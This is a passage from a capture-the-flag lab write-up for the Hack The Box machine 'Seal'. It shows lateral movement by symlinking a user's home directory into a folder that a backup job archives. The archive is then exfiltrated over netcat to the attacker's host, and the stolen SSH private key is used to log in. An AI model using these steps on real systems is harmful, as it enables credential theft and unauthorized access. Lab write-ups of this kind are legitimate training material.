Symbolic Link Attack
As discovered, there is a backup operation made by the ansible binary. The YAML file located at /opt/backups/playbook/run.yml is the configuration for the operation.
The archived files are stored in the /opt/backups/archives directory and I do have read access to that as I was able to get one open
tomcat@seal:/opt/backups/archives$ ll /var/lib/tomcat9/webapps/ROOT/admin/dashboard
total 100K
4.0K drwxr-xr-x 7 root root 4.0K May 7 2021 .
4.0K drwxrwxrwx 2 root root 4.0K May 7 2021 uploads
4.0K drwxr-xr-x 3 root root 4.0K May 6 2021 ..
72K -rw-r--r-- 1 root root 71K May 6 2021 index.html
4.0K drwxr-xr-x 5 root root 4.0K Mar 7 2015 bootstrap
4.0K drwxr-xr-x 2 root root 4.0K Mar 7 2015 css
4.0K drwxr-xr-x 4 root root 4.0K Mar 7 2015 images
4.0K drwxr-xr-x 4 root root 4.0K Mar 7 2015 scriptsIt seems that I do also have write access to one of the sub-directory within the source directory; /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
As the operation is being done with the privileges of the luis user, I may be able to set up a symbolic link from the writable directory pointed above to the home directory of the luis user.
tomcat@seal:/opt/backups/archives$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
tomcat@seal:/opt/backups/archives$ ll /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
total 8.0K
4.0k drwxrwxrwx 2 root root 4.0k apr 11 17:25 .
0 lrwxrwxrwx 1 tomcat tomcat 10 apr 11 17:25 luis -> /home/luis
4.0K drwxr-xr-x 7 root root 4.0K May 7 2021 ..A symbolic link is set up at the writable directory pointing to the home directory of the luis user
Uploaded files get wiped off fairly quickly
tomcat@seal:/opt/backups/archives$ ll
total 111M
4.0k drwxr-xr-x 4 luis luis 4.0k apr 11 17:25 ..
111m -rw-rw-r-- 1 luis luis 111m apr 11 17:25 backup-2023-04-11-17:25:32.gz
4.0k drwxrwxr-x 2 luis luis 4.0k apr 11 17:25 .A moment later, an archive is generated. Notice how large the archive is now I was trying to extract content locally, but it wouldn’t let me do it due to permission issues
tomcat@seal:/opt/backups/archives$ nc 10.10.14.7 2222 < backup-2023-04-11-17:25:32.gz
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ nnc 2222 > backup-2023-04-11-17:25:32.gz
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56042So I transferred the archive to Kali over Netcat
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ tar -xf backup-2023-04-11-17:25:32.gz --force-localExtracting the content
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ cd dashboard/uploads ; ll
total 12K
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 .
4.0K drwxr-xr-x 7 kali kali 4.0K May 7 2021 ..
4.0K drwxr-xr-x 9 kali kali 4.0K May 7 2021 luisand there is the home directory of the luis user under the uploads/ directory
┌──(kali㉿kali)-[~/…/seal/ansible/dashboard/uploads]
└─$ cd luis ; ll
total 51M
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 .config
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 .java
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 .local
4.0k drwx------ 2 kali kali 4.0k apr 11 19:28 .ssh
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 .ansible
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 .cache
4.0k drwxr-xr-x 6 kali kali 4.0k apr 11 19:28 .gitbucket
4.0k drwxr-xr-x 3 kali kali 4.0k apr 11 19:28 ..
4.0k -r-------- 1 kali kali 33 apr 11 16:29 user.txt
4.0K drwxr-xr-x 9 kali kali 4.0K May 7 2021 .
4.0K -rw-r--r-- 1 kali kali 220 May 5 2021 .bash_logout
4.0K -rw-r--r-- 1 kali kali 3.8K May 5 2021 .bashrc
4.0K -rw-r--r-- 1 kali kali 807 May 5 2021 .profile
51M -rw-r--r-- 1 kali kali 51M Jan 14 2021 gitbucket.warI can see the whole thing inside including the .ssh directory
┌──(kali㉿kali)-[~/…/ansible/dashboard/uploads/luis]
└─$ cd .ssh ; ll
total 20K
4.0k drwx------ 2 kali kali 4.0k apr 11 19:28 .
4.0K drwxr-xr-x 9 kali kali 4.0K May 7 2021 ..
4.0K -rw-r--r-- 1 kali kali 563 May 7 2021 authorized_keys
4.0K -rw------- 1 kali kali 2.6K May 7 2021 id_rsa
4.0K -rw-r--r-- 1 kali kali 563 May 7 2021 id_rsa.puband there are the SSH key pair for the luis user.
SSH
┌──(kali㉿kali)-[~/…/dashboard/uploads/luis/.ssh]
└─$ ssh luis@seal.htb -i id_rsa
The authenticity of host 'seal.htb (10.10.10.250)' can't be established.
ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'seal.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 11 Apr 2023 05:32:37 PM UTC
System load: 0.2
Usage of /: 47.7% of 9.58GB
Memory usage: 23%
Swap usage: 0%
Processes: 172
Users logged in: 0
IPv4 address for eth0: 10.10.10.250
IPv6 address for eth0: dead:beef::250:56ff:feb9:d927
* Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!
https://microk8s.io/
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri May 7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ whoami
luis
luis@seal:~$ hostname
seal
luis@seal:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.250 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:d927 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:d927 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:d9:27 txqueuelen 1000 (Ethernet)
RX packets 111829 bytes 11557690 (11.5 MB)
RX errors 0 dropped 86 overruns 0 frame 0
TX packets 93209 bytes 360110978 (360.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1262 bytes 3931261 (3.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1262 bytes 3931261 (3.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Lateral Movement made to the luis user by exploiting a misconfigured archiving operation